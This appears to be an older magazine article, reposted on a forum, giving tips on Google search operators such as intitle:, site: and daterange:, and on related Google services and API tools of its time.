Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.
Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as
www.mysite.com/index.html
You can also enter intext:html.
Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in
link:http://www.hungry-hackers.com
Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.
Swiss Army Google
Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature
(www.google.com/help/features.html#calculator)
Lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”
Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.
Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search
(www.buzztoolbox.com/google/yellowsearch.shtml).
Extended Googling
Google offers several services that give you a head start in focusing your search. Google Groups
(http://groups.google.com)
indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at
www.google.com/options/index.html
You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
Google Alert
(www.googlealert.com)
monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts
(www.google.com/newsalerts).
This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)
Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
(http://labs.google.com),
a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out). With Google Voice Search
(http://labs1.google.com/gvs.html),
you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.
In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from
CODE
www.google.com/apis

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You’ll be amazed at how many different ways Google can improve your Internet searching.
Online Extra: More Google Tips
Here are a few more clever ways to tweak your Google searches.
Search Within a Timeframe
Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic’s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as
CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules – Edit by Ninja excl.gif), but an easier way is to do a Google daterange: search by filling in a form at
www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml
If one special syntax element is good, two must be better, right? Sometimes. Though some operators can’t be mixed (you can’t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.
More Google API Applications
Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query
(www.staggernation.com/gawsh/).
When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL
(www.staggernation.com/garbo/).
Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it’s not something you’d do every day, but if your cell phone does e-mail and doesn’t do Web browsing, this is a very handy address to know.